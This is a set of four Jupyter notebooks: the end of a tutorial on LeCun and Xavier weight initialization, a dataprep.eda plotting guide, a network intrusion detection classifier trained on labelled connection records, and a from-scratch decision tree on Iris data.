activation', 'Tanh derivative')) # + [markdown] id="FP4Ce5lpxhQ-" colab_type="text" # Tanh is widely used in recurrent neural networks today. # # Nowadays we have many ways to address vanishing gradient and similar exploding gradient issues. And one of these is better initialization. Initialization is also important because gradient-based methods can stuck in bad local minima, not reaching the global minimum, and take long to converge because of plateus in the cost function surface. Better initialization reduces chances to start from "unlucky" points. # + [markdown] id="-RRTYIBsr3bA" colab_type="text" # ## LeCun Initialization # # This is one of the first heuristics for initialization. It was proposed in 1998 by <NAME> et al. in the paper called "[Efficient BackProp](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)". LeCun initialization suggests that weights of network are drawn from normal distribution of the following form # # \begin{equation} # W \sim \mathcal{N}\Bigg(0, \frac{1}{fan_{in}}\Bigg) # \end{equation} # # where $fan_{in}$ is the number of connections feeding into the node. This is also known as LeCun normal initialization, while in case of LeCun uniform initialization weights are drawn from uniform distribution # # \begin{equation} # W \sim \mathcal{U}\Bigg(-\frac{1}{\sqrt{fan_{in}}}, \frac{1}{\sqrt{fan_{in}}}\Bigg) # \end{equation} # # LeCun initialization was designed specifically for sigmoid activation. But it has more applications than that. It was proposed to be used with the [SELU activation function and self-normalizing networks](https://arxiv.org/pdf/1706.02515.pdf). # # Note that regardless the method of initialization, weights are usually drawn either from normal or uniform distribution, and there's connection between them. If we initialize from a normal distribution with $\mathrm{Var}[W] = \sigma^2$, we can easily switch to uniform distribution by computing $a = \sqrt{3\sigma^2}$ and sampling weights from $\mathcal{U}(-a, a)$. Because of this connection I will only consider normal distribution and specify suggested variance for it. # + [markdown] id="USE3UUSF2ReM" colab_type="text" # ### Derivation of LeCun Initialization # # The reasoning behind LeCun initialization is fairly simple. We don't want weights to be very large, because they will lead to saturation and cause gradient vanishing. We also don't want weights to be very small, because they will make gradient small as well and make the whole optimization slow. What we want is that initial weights map inputs into linear region of sigmoid (roughly between -2 and 2), so the gradient is large enough and network learns easier linear part first. # # Consider a sigmoid layer and let $x$ denote input example and $y$ linearly transformed input, so # # \begin{equation} # y = xW \\ # y_i = \sum_{j = 1}^{fan_{in}}{x_{j}w_{ji}} # \end{equation} # # We can think of bias term as weight that always receives 1 as input and omit it. To achieve the above requirements we first demand $x$ to have zero mean and variance of 1. This is satisfied by normalizing inputs. Now we want initialize weights so that they ensure $y$ also has zero mean and unit variance. Let's write down expression for the variance of $y_i$ # # \begin{equation} # \mathrm{Var}[y_i] = \mathrm{Var}\Bigg[\sum_{j = 1}^{fan_{in}}{x_{j}w_{ji}}\Bigg] = \sum_{j = 1}^{fan_{in}} w_{ji}^2\mathrm{Var}[x_j] + \sum_{j \neq k}w_{ji}w_{ki}\mathrm{Cov}[x_j, x_k] # \end{equation} # # Assuming uncorrelated $x$, we have $\mathrm{Cov}[x_j, x_k] = 0$ for all pairs $j \neq k$. Recall we assumed all $\mathrm{Var}[x_i] = 1$. Hence # # \begin{equation} # \mathrm{Var}[y_i] = \sum_{j = 1}^{fan_{in}} w_{ji}^2 \Rightarrow\ \mathrm{Var}[w] = \frac{\mathrm{Var}[y]}{fan_{in}} = \frac{1}{fan_{in}} # \end{equation} # # And that's it! One thing that should be mentioned here is that original paper also proposed a variant of sigmoid that ensures $\sigma(y)$ preserves zero mean and unit variance of $y$. # + [markdown] id="DwWYh6bA8_OI" colab_type="text" # ## Xavier (Glorot) Initialization # # The next method was proposed in paper "[Understanding the Difficulty of Training Deep Feedforward Neural Networks](http://proceedings.mlr.press/v9/glorot10a/glorot10a.pdf)" by <NAME> and <NAME> in 2010. I don't know who decides whether we should call an invention after author's first name or last name, but this technique is widely known under both Xavier initialization and Glorot initialization. # # If you have skimmed through the derivation of LeCun initialization above or read it in original paper, you might have noticed that it was motivated entirely from the perspective of the forward pass. In their paper Glorot and Bengio additionly require preserving variance of gradient during the backward pass. From one hand, the forward pass requires, as previously # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{in}} # \end{equation} # # They show that the backward pass from the other hand requires # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{out}} # \end{equation} # # where $fan_{out}$ is the number of connections going out of a unit. # # Both constraints can be satisfied if and only if $fan_{in} = fan_{out}$, which isn't always the case. As a compromise authors suggest to set variance to # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{avg}} = \frac{2}{fan_{in} + fan_{out}} # \end{equation} # # Observe also that when $fan_{in} = fan_{out}$ Xavier initialization and LeCun initialization are equivalent. # # The paper compares performance of several networks of the same architecture that only differ in activation function and initialization method. Those networks were trained on different data sets using the same procedure. The final test errors for networks using tanh activation are represented in the following table # # TYPE | Shapeset | MNIST | CIFAR-10 | Small ImageNet # --- | --- | --- | --- | --- # Tanh | 27.15 | 1.76 | 55.9 | 70.58 # Tanh N | 15.60 | 1.64 | 52.92 | 68.57 # # Here tanh stands for the network with tanh activations and LeCun uniform initialization, while tanh N - for the network with tanh activations and Xavier uniform initialization. As can be seen, on all data sets Xavier initialization gives little to significant boost in performance when compared to LeCun initialization. # # A trouble with Xavier initialization is that it assumes linear units. This is a valid assumption when inputs are mapped to linear parts of non-linearities, but invalid in general. Nevertheless it still works pretty well. The following histograms of activation values and gradients from the paper show that Xavier initialization in experimental settings works as intended. Check out details in original paper! # + [markdown] id="nCK1TXhRPeoD" colab_type="text" # ### Derivation of Xavier Initialization # # Consider a neural network with $L$ consequent layers. We begin with writing down equations for both forward and backward propagations. We make the same assumptions about input data as in the derivation of LeCun initialization. The forward pass is given by # # \begin{equation} # Z^{[i]}_k = \varphi^{[i]}(Z^{[i - 1]}_k) W^{[i]}_{:, k} # \end{equation} # # And the backward pass by # # \begin{equation} # \frac{\partial\mathscr{L}}{\partial Z^{[i]}_k} = \varphi^{[i]\prime}(Z^{[i]}_k)W^{[i]}_{k, :}\frac{\partial\mathscr{L}}{\partial Z^{[i + 1]}} \\ # \frac{\partial\mathscr{L}}{\partial W^{[i]}_{lk}} = Z^{[i]}_l \frac{\partial\mathscr{L}}{\partial Z^{[i]}_k} # \end{equation} # # Then for a layer number $i$, assuming that $\varphi^{[i]\prime}(z^{[i]}_k) = 1$ # # \begin{equation} # \mathrm{Var}[Z^{[i]}] = \mathrm{Var}[X]\prod_{j=0}^{i-1}n^{[j]}\mathrm{Var}[W^{[j]}]\\ # \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[L]}}\Bigg]\prod_{j = i}^{L - 1}n^{[j + 1]}\mathrm{Var}[W^{[j]}]\\ # \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial W^{[i]}}\Bigg] = \mathrm{Var}[Z^{[i]}]\mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] # \end{equation} # # From the perspective of the forward pass we wish # # \begin{equation} # \forall\ (i, j):\ \mathrm{Var}[Z^{[i]}] = \mathrm{Var}[Z^{[j]}] # \end{equation} # # And from the back prop point of view we want # # \begin{equation} # \forall\ (i, j):\ \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[j]}}\Bigg] # \end{equation} # # These two constraints can be easily satisfied if # # \begin{equation} # \forall\ i:\ n^{[i]}\mathrm{Var}[W^{[i]}] = \mathrm{Var}[X] = 1\\ # \forall\ i:\ n^{[i + 1]}\mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[L]}}\Bigg] = 1 # \end{equation} # # From these two equations we finally get # # \begin{equation} # \mathrm{Var}[W^{[i]}] = \frac{1}{n^{[i]}} = \frac{1}{fan_{in}} \\ # \mathrm{Var}[W^{[i]}] = \frac{1}{n^{[i + 1]}} = \frac{1}{fan_{out}} # \end{equation} # # As a compromise for cases when $fan_{in} \neq fan_{out}$ # # \begin{equation} # \mathrm{Var}[W^{[i]}] = \frac{2}{fan_{in} + fan_{out}} # \end{equation} # + [markdown] id="RFYrZj0YRam1" colab_type="text" # ## Conclusions # # Without appropriate choice of activation function and/or smart initialization for it neural networks, especially deep ones, tend to refuse training at all. Better activation functions and better initialization strategies are tightly related, so that they complement each other and evolve together. Once popular sigmoid non-linearity turned out to be impractical to use in hidden layers, and now is only used in the output layer for binary classification, while tanh that can be expressed in terms of sigmoid, is still useful for hidden layers. At the first glance initialization strategies seem some wisdom sent from heaven, but at least in case of LeCun and Xavier initialization their derivations are in fact straightforward. All you need to know is where to start and what assumptions to make.
_notebooks/2020-07-31-An-Overview-of-Activations-and-Initializations-for-Deep-Neural-Networks,-Part-1.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # `plot()`: analyze distributions # ## Overview # The function `plot()` explores the distributions and statistics of the dataset. It generates a variety of visualizations and statistics which enables the user to achieve a comprehensive understanding of the column distributions and their relationships. The following describes the functionality of `plot()` for a given dataframe `df`. # # 1. `plot(df)`: plots the distribution of each column and computes dataset statistics # 2. `plot(df, col1)`: plots the distribution of column `col1` in various ways, and computes its statistics # 3. `plot(df, col1, col2)`: generates plots depicting the relationship between columns `col1` and `col2` # # The generated plots are different for numerical, categorical and geography columns. The following table summarizes the output for the different column types. # # | `col1` | `col2` | Output | # | --- | --- | --- | # | None | None | dataset statistics, [histogram](https://www.wikiwand.com/en/Histogram) or [bar chart](https://www.wikiwand.com/en/Bar_chart) for each column | # | Numerical | None | column statistics, histogram, [kde plot](https://www.wikiwand.com/en/Kernel_density_estimation), [qq-normal plot](https://www.wikiwand.com/en/Q%E2%80%93Q_plot), [box plot](https://www.wikiwand.com/en/Box_plot) | # | Categorical | None | column statistics, bar chart, [pie chart](https://www.wikiwand.com/en/Pie_chart), [word cloud](https://www.wikiwand.com/en/Tag_cloud), word frequencies | # | Geography | None | column statistics, bar chart, [pie chart](https://www.wikiwand.com/en/Pie_chart), [word cloud](https://www.wikiwand.com/en/Tag_cloud), word frequencies, world map | # | Numerical | Numerical | [scatter plot](https://www.wikiwand.com/en/Scatter_plot), [hexbin plot](https://www.data-to-viz.com/graph/hexbinmap.html), binned box plot| # | Numerical | Categorical | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart) | # | Categorical | Numerical | categorical box plot, multi-line chart # | Categorical | Categorical | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Categorical | Geography | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Geography | Categorical | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Geopoint | Categorical | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Categorical | Geopoint | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Numerical | Geography | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart), world map | # | Geography | Numerical | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart), world map | # | Numerical | Geopoint | geo map| # | Geopoint | Numerical | geo map| # # Next, we demonstrate the functionality of `plot()`. # ## Load the dataset # `dataprep.eda` supports **Pandas** and **Dask** dataframes. Here, we will load the well-known [adult dataset](http://archive.ics.uci.edu/ml/datasets/Adult) into a Pandas dataframe using the load_dataset function. from dataprep.datasets import load_dataset import numpy as np df = load_dataset('adult') df = df.replace(" ?", np.NaN) # ## Get an overview of the dataset with `plot(df)` # We start by calling `plot(df)` which computes dataset-level statistics, a histogram for each numerical column, and a bar chart for each categorical column. The number of bins in the histogram can be specified with the parameter `bins`, and the number of categories in the bar chart can be specified with the parameter `ngroups`. If a column contains missing values, the percent of missing values is shown in the title and ignored when generating the plots. from dataprep.eda import plot plot(df) # ## Understand a column with `plot(df, col1)` # # After getting an overview of the dataset, we can thoroughly investigate a column of interest `col1` using `plot(df, col1)`. The output is of `plot(df, col1)` is different for numerical and categorical columns. # # When `col1` is a numerical column, it computes column statistics, and generates a histogram, kde plot, box plot and qq-normal plot: plot(df, "age") # When `x` is a categorical column, it computes column statistics, and plots a bar chart, pie chart, word cloud, word frequency and word length: plot(df, "education") # When `x` is a Geography column, it computes column statistics, and plots a bar chart, pie chart, word cloud, word frequency, word length and world map: df_geo = load_dataset('countries') plot(df_geo, "Country") # ## Understand the relationship between two columns with `plot(df, col1, col2)` # # Next, we can explore the relationship between columns `col1` and `col2` using `plot(df, col1, col2)`. The output depends on the types of the columns. # # When `col1` and `col2` are both numerical columns, it generates a scatter plot, hexbin plot and box plot: plot(df, "age", "hours-per-week") # When `col1` and `col2` are both categorical columns, it plots a nested bar chart, stacked bar chart and heat map: plot(df, "education", "marital-status") # When `col1` and `col2` are one each of type numerical and categorical, it generates a box plot per category and a multi-line chart: plot(df, "age", "education") # or plot(df, "education", "age") # When `col1` and `col2` are one each of type geopoint and categorical, or, geography and categorical, it generates a box plot per category and a multi-line chart: # + from dataprep.eda.dtypes_v2 import LatLong covid = load_dataset('covid19') latlong = LatLong("Lat", "Long") # create geopoint type using "LatLong" function by inputing two columns names plot(covid, latlong, "Country/Region") # or plot(covid, "Country/Region", latlong) plot(df_geo,"Country", "Region") # or plot(df_geo, "Region", "Country") # - # When `col1` and `col2` are one each of type geography and numerical, it generates a box plot per category, a multi-line chart and a world map: plot(df_geo,"Country", "Population") # or plot(df_geo, "Population", "Country") # When `col1` and `col2` are one each of type geopoint and numerical, it generates a geo map: plot(covid, latlong, "2/16/2020") # or plot(covid, "2/16/2020", latlong)
docs/source/user_guide/eda/plot.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import numpy as np import pandas as pd network_data = pd.read_csv("E:\data_science_classes\Train.txt", header = None) network_test = pd.read_csv("E:\data_science_classes\Test.txt", header = None) list_col = ["duration","protocol_type","service","flag","src_bytes","dst_bytes","land", "wrong_fragment","urgent","hot","num_failed_logins","logged_in", "num_compromised","root_shell","su_attempted","num_root","num_file_creations", "num_shells","num_access_files","num_outbound_cmds","is_host_login", "is_guest_login","count","srv_count","serror_rate", "srv_serror_rate", "rerror_rate","srv_rerror_rate","same_srv_rate", "diff_srv_rate", "srv_diff_host_rate","dst_host_count","dst_host_srv_count","dst_host_same_srv_rate", "dst_host_diff_srv_rate","dst_host_same_src_port_rate", "dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate", "dst_host_rerror_rate","dst_host_srv_rerror_rate","attack", "last_flag"] network_data.rename(columns= { k:v for (k,v) in zip(network_data.columns, list_col)}, inplace = True) network_test.rename(columns= { k:v for (k,v) in zip(network_test.columns, list_col)}, inplace = True) dos =["back", "land" , "neptune", "pod", "smurf", "teardrop", "apache2", "udpstorm", "processtable", "worm"] probe = ["satan","ipsweep", "nmap", "portsweep", "mscan", "saint"] r2l =["guess_passwd","ftp_write","imap","phf","multihop","warezmaster","warezclient","spy","xlock","xsnoop","snmpguess","snmpgetattack","httptunnel","sendmail","named"] u2r = ["buffer_overflow", "loadmodule", "rootkit", "perl","sqlattack", "xterm","ps","mailbomb"] for i in list(network_data.index): if list(network_data.loc[[i],["attack"]].attack)[0] == "normal": network_data.loc[[i],["attack"]] = 0 elif list(network_data.loc[[i],["attack"]].attack)[0] in dos: network_data.loc[[i],["attack"]] = 1 elif list(network_data.loc[[i],["attack"]].attack)[0] in probe: network_data.loc[[i],["attack"]] = 2 elif list(network_data.loc[[i],["attack"]].attack)[0] in r2l: network_data.loc[[i],["attack"]] = 3 elif list(network_data.loc[[i],["attack"]].attack)[0] in u2r: network_data.loc[[i],["attack"]] = 4 for i in list(network_test.index): if list(network_test.loc[[i],["attack"]].attack)[0] == "normal": network_test.loc[[i],["attack"]] = 0 elif list(network_test.loc[[i],["attack"]].attack)[0] in dos: network_test.loc[[i],["attack"]] = 1 elif list(network_test.loc[[i],["attack"]].attack)[0] in probe: network_test.loc[[i],["attack"]] = 2 elif list(network_test.loc[[i],["attack"]].attack)[0] in r2l: network_test.loc[[i],["attack"]] = 3 elif list(network_test.loc[[i],["attack"]].attack)[0] in u2r: network_test.loc[[i],["attack"]] = 4 cat_col = [] num_col = [] for i in network_data.columns: if network_data[i].dtype.name in ['object']: cat_col.append(i) else: num_col.append(i) num_col.remove("attack") def outlier_treat(x,y): for i in x: y[i]= y[i].clip_upper(y[i].quantile(0.99)) y[i]= y[i].clip_lower(y[i].quantile(0.01)) outlier_treat(num_col,network_data) outlier_treat(num_col,network_test) def drop_0(j): zeros_col = [] for i in j.columns: k = list(j[i].value_counts()) if len(k)==1: j.drop(i, axis = 1, inplace = True) drop_0(network_data) network_data.shape network_test = network_test[network_data.columns] ## Categorical Variable chi square test for variable selection import scipy.stats as stats chisq_df = pd.DataFrame() for i in cat_col: cross_tab = pd.crosstab(network_data[i],network_data['attack'], margins=False) stats.chi2_contingency(observed=cross_tab)[1] temp = pd.DataFrame([i,stats.chi2_contingency(observed=cross_tab)[0],stats.chi2_contingency(observed=cross_tab)[1]]).T temp.columns = ['Variable', 'ChiSquare','P-Value'] chisq_df = pd.concat([chisq_df, temp], axis=0, ignore_index=True) chisq_df ## Numerical Variable t test for variable selection tstats_df = pd.DataFrame() for i in num_col: tstats = stats.ttest_ind(network_data[network_data['attack']==1][i],network_data[network_data['attack']==0][i]) temp = pd.DataFrame([i, tstats[0], tstats[1]]).T temp.columns = ['Variable Name', 'T-Statistic', 'P-Value'] tstats_df = pd.concat([tstats_df, temp], axis=0, ignore_index=True) tstats_df drop_ttest_col = list(tstats_df[tstats_df["P-Value"] >0.05]["Variable Name"]) drop_ttest_col # + #checking log likelihood # - import statsmodels.formula.api as sm llf_df = pd.DataFrame() for i in num_col: data1 = pd.concat([network_data[network_data["attack"] == 1],network_data[network_data["attack"] == 0]], axis = 0) logreg = sm.logit(formula ="attack~" +i, data=data1) result = logreg.fit() summ = result.summary() temp = pd.DataFrame([i, result.llf]).T temp.columns = ['Variable Name','Log-Likelihood Full'] llf_df = pd.concat([llf_df, temp], axis=0) llf_df.sort_values(by = "Log-Likelihood Full").head(8) def dummies(k,j): x= [] for i in k: x.append(pd.get_dummies(j[i], prefix ="d")) return(x) cat_dum = dummies(cat_col,network_data) cat_dum_t = dummies(cat_col,network_test) cat_dum_df = pd.DataFrame(pd.concat(cat_dum, axis=1)) cat_dum_t_df = pd.DataFrame(pd.concat(cat_dum_t, axis=1)) num_df = network_data[num_col] num_t_df = network_test[num_col] num_t_df.head() new_network_data= pd.concat([cat_dum_df,num_df], axis=1) new_network_test= pd.concat([cat_dum_t_df,num_t_df], axis=1) print(new_network_data.shape) print(new_network_test.shape) new_network_data= pd.concat([new_network_data,network_data.attack], axis=1) new_network_test= pd.concat([new_network_test,network_test.attack], axis=1) common_var = [] for i in new_network_test.columns: if i in new_network_data.columns: common_var.append(i) new_network_test = new_network_test[common_var] new_network_data = new_network_data[common_var] #multi colinear from pandas profiling drp_col = ["dst_host_rerror_rate","dst_host_srv_rerror_rate","dst_host_serror_rate", "dst_host_srv_serror_rate","srv_serror_rate","srv_rerror_rate","d_S0"] new_network_data.drop(drp_col,axis=1,inplace= True) new_network_test.drop(drp_col,axis=1,inplace= True) print(new_network_data.shape) print(new_network_test.shape) import seaborn as sns corr_all = new_network_data.corr() sns.heatmap(corr_all) corr_y = corr_all["attack"] corr_y_df = pd.DataFrame(corr_y) corr_y_df.head() corr_y_df["attack"] = np.abs(corr_y_df["attack"]) corr_y_df.head(7) corr_y_df = corr_y_df.sort_values(by= "attack", ascending= True) corr_y_df.head(5) corr_y_df.reset_index(inplace = True) corr_y_df.head() drop_corr = [] for i in list(corr_y_df.attack): if i < 0.01: for k in corr_y_df.index: if corr_y_df.loc[k,"attack"] == i: drop_corr.append(corr_y_df.loc[k,"index"]) for i in drop_corr: new_network_data.drop(i, inplace = True, axis = 1) new_network_data.shape #selecting all columns except y column feature_columns = new_network_data.columns.difference( ["attack"] ) #splitting test and train data train_X = new_network_data[feature_columns] test_X = new_network_test[feature_columns] train_y = new_network_data["attack"] test_y = new_network_test["attack"] # ### making model using sklearn from sklearn.linear_model import LogisticRegression logreg = LogisticRegression() logreg.fit( train_X, train_y ) logreg.predict(test_X) #Predicting the test cases network_test_pred = pd.DataFrame({ 'actual': test_y, 'predicted': logreg.predict(test_X)}) network_test_pred.sample(10) # Creating a confusion matrix from sklearn import metrics cm = metrics.confusion_matrix(network_test_pred.actual, network_test_pred.predicted) cm import matplotlib.pyplot as plt import seaborn as sbn # %matplotlib inline sbn.heatmap(cm, annot=True, fmt='.2f', xticklabels = ["normal","dos ","probe","r2l","u2r"] , yticklabels = ["normal","dos","probe","r2l","u2r"] ) plt.ylabel('True label') plt.xlabel('Predicted label') import sklearn.metrics as metrics #also using sklearn.metrics score = metrics.accuracy_score( network_test_pred.actual, network_test_pred.predicted ) score # ### making model using decision tree import sklearn.tree as dt import sklearn.ensemble as en from sklearn import metrics from sklearn.tree import DecisionTreeClassifier, export_graphviz, export dt_network_data= pd.concat([cat_dum_df,num_df], axis=1) dt_network_test= pd.concat([cat_dum_t_df,num_t_df], axis=1) dt_network_data= pd.concat([dt_network_data,network_data.attack], axis=1) dt_network_test= pd.concat([dt_network_test,network_test.attack], axis=1) common_var = [] for i in dt_network_test.columns: if i in dt_network_data.columns: common_var.append(i) dt_network_data=dt_network_data[common_var] dt_network_test=dt_network_test[common_var] #selecting all columns except y column feature_columns_dt = dt_network_data.columns.difference( ["attack"] ) train_X_dt = dt_network_data[feature_columns_dt] test_X_dt = dt_network_test[feature_columns_dt] train_y_dt = dt_network_data["attack"] test_y_dt = dt_network_test["attack"] network_data_tree = DecisionTreeClassifier( max_depth = 15,max_features= 90 ) network_data_tree.fit( train_X_dt, train_y_dt ) tree_test_pred = pd.DataFrame( { 'actual': test_y_dt, 'predicted': network_data_tree.predict( test_X_dt ) } ) metrics.accuracy_score( tree_test_pred.actual, tree_test_pred.predicted ) cm_dt = metrics.confusion_matrix(tree_test_pred.actual,tree_test_pred.predicted ) cm_dt sbn.heatmap(cm_dt, annot=True, fmt='.2f', xticklabels = ["normal","dos ","probe","r2l","u2r"] , yticklabels = ["normal","dos","probe","r2l","u2r"]) plt.ylabel('True label') plt.xlabel('Predicted label') # + #fine tuning the parameters # - from sklearn.model_selection import GridSearchCV param_grid = {'max_depth': np.arange(9, 20), 'max_features': np.arange(70,90)} tree = GridSearchCV(DecisionTreeClassifier(), param_grid, cv = 10) tree.fit( train_X_dt, train_y_dt ) tree.best_params_ tree.best_score_ new_network_data_tree = DecisionTreeClassifier( max_depth = 18, max_features = 85) new_network_data_tree.fit( train_X_dt, train_y_dt ) new_tree_test_pred = pd.DataFrame( { 'actual': test_y_dt, 'predicted': new_network_data_tree.predict( test_X_dt ) } ) metrics.accuracy_score( new_tree_test_pred.actual, new_tree_test_pred.predicted ) new_cm_dt = metrics.confusion_matrix(new_tree_test_pred.actual,new_tree_test_pred.predicted ) new_cm_dt sbn.heatmap(new_cm_dt, annot=True, fmt='.2f', xticklabels = ["normal","dos ","probe","r2l","u2r"] , yticklabels = ["normal","dos","probe","r2l","u2r"]) plt.ylabel('True label') plt.xlabel('Predicted label')
3_multinomial_NETWORK INTRUSION DETECTION.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # The goal of this notebook is to code a decision tree classifier that can be used with the following API. # + active="" # df = pd.read_csv("data.csv") # + active="" # train_df, test_df = train_test_split(df, test_size=0.2) # tree = decision_tree_algorithm(train_df) # accuracy = calculate_accuracy(test_df, tree) # - # # Import Statements # + import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns # %matplotlib inline import random from pprint import pprint # - # # Load and Prepare Data # #### Format of the data # - last column of the data frame must contain the label and it must also be called "label" # - there should be no missing values in the data frame df = pd.read_csv("Iris.csv") df = df.drop("Id", axis=1) df = df.rename(columns={"species": "label"}) df.head() # # Train-Test-Split def train_test_split(df, test_size): if isinstance(test_size, float): test_size = round(test_size * len(df)) indices = df.index.tolist() test_indices = random.sample(population=indices, k=test_size) test_df = df.loc[test_indices] train_df = df.drop(test_indices) return train_df, test_df random.seed(0) train_df, test_df = train_test_split(df, test_size=20) # # Helper Functions data = train_df.values data[:5] # ### Data pure? def check_purity(data): label_column = data[:, -1] unique_classes = np.unique(label_column) if len(unique_classes) == 1: return True else: return False # ### Classify def classify_data(data): label_column = data[:, -1] unique_classes, counts_unique_classes = np.unique(label_column, return_counts=True) index = counts_unique_classes.argmax() classification = unique_classes[index] return classification # ### Potential splits? def get_potential_splits(data): potential_splits = {} _, n_columns = data.shape for column_index in range(n_columns - 1): # excluding the last column which is the label potential_splits[column_index] = [] values = data[:, column_index] unique_values = np.unique(values) for index in range(len(unique_values)): if index != 0: current_value = unique_values[index] previous_value = unique_values[index - 1] potential_split = (current_value + previous_value) / 2 potential_splits[column_index].append(potential_split) return potential_splits # ### Split Data def split_data(data, split_column, split_value): split_column_values = data[:, split_column] data_below = data[split_column_values <= split_value] data_above = data[split_column_values > split_value] return data_below, data_above # ### Lowest Overall Entropy? def calculate_entropy(data): label_column = data[:, -1] _, counts = np.unique(label_column, return_counts=True) probabilities = counts / counts.sum() entropy = sum(probabilities * -np.log2(probabilities)) return entropy def calculate_overall_entropy(data_below, data_above): n = len(data_below) + len(data_above) p_data_below = len(data_below) / n p_data_above = len(data_above) / n overall_entropy = (p_data_below * calculate_entropy(data_below) + p_data_above * calculate_entropy(data_above)) return overall_entropy def determine_best_split(data, potential_splits): overall_entropy = 9999 for column_index in potential_splits: for value in potential_splits[column_index]: data_below, data_above = split_data(data, split_column=column_index, split_value=value) current_overall_entropy = calculate_overall_entropy(data_below, data_above) if current_overall_entropy <= overall_entropy: overall_entropy = current_overall_entropy best_split_column = column_index best_split_value = value return best_split_column, best_split_value # # Decision Tree Algorithm # ### Representation of the Decision Tree # + active="" # sub_tree = {question: [yes_answer, no_answer]} # - example_tree = {"petal_width <= 0.8": ["Iris-setosa", {"petal_width <= 1.65": [{"petal_length <= 4.9": ["Iris-versicolor", "Iris-virginica"]}, "Iris-virginica"]}]} # ### Algorithm def decision_tree_algorithm(df, counter=0, min_samples=2, max_depth=5): # data preparations if counter == 0: global COLUMN_HEADERS COLUMN_HEADERS = df.columns data = df.values else: data = df # base cases if (check_purity(data)) or (len(data) < min_samples) or (counter == max_depth): classification = classify_data(data) return classification # recursive part else: counter += 1 # helper functions potential_splits = get_potential_splits(data) split_column, split_value = determine_best_split(data, potential_splits) data_below, data_above = split_data(data, split_column, split_value) # instantiate sub-tree feature_name = COLUMN_HEADERS[split_column] question = "{} <= {}".format(feature_name, split_value) sub_tree = {question: []} # find answers (recursion) yes_answer = decision_tree_algorithm(data_below, counter, min_samples, max_depth) no_answer = decision_tree_algorithm(data_above, counter, min_samples, max_depth) # If the answers are the same, then there is no point in asking the qestion. # This could happen when the data is classified even though it is not pure # yet (min_samples or max_depth base case). if yes_answer == no_answer: sub_tree = yes_answer else: sub_tree[question].append(yes_answer) sub_tree[question].append(no_answer) return sub_tree tree = decision_tree_algorithm(train_df, max_depth=3) pprint(tree) # # Classification # + active="" # sub_tree = {question: [yes_answer, no_answer]} # - example = test_df.iloc[0] example def classify_example(example, tree): question = list(tree.keys())[0] feature_name, comparison_operator, value = question.split(" ") # ask question if example[feature_name] <= float(value): answer = tree[question][0] else: answer = tree[question][1] # base case if not isinstance(answer, dict): return answer # recursive part else: residual_tree = answer return classify_example(example, residual_tree) classify_example(example, tree) # # Calculate Accuracy def calculate_accuracy(df, tree): df["classification"] = df.apply(classify_example, axis=1, args=(tree,)) df["classification_correct"] = df["classification"] == df["label"] accuracy = df["classification_correct"].mean() return accuracy accuracy = calculate_accuracy(test_df, tree) accuracy
handling only continuous variables.ipynb
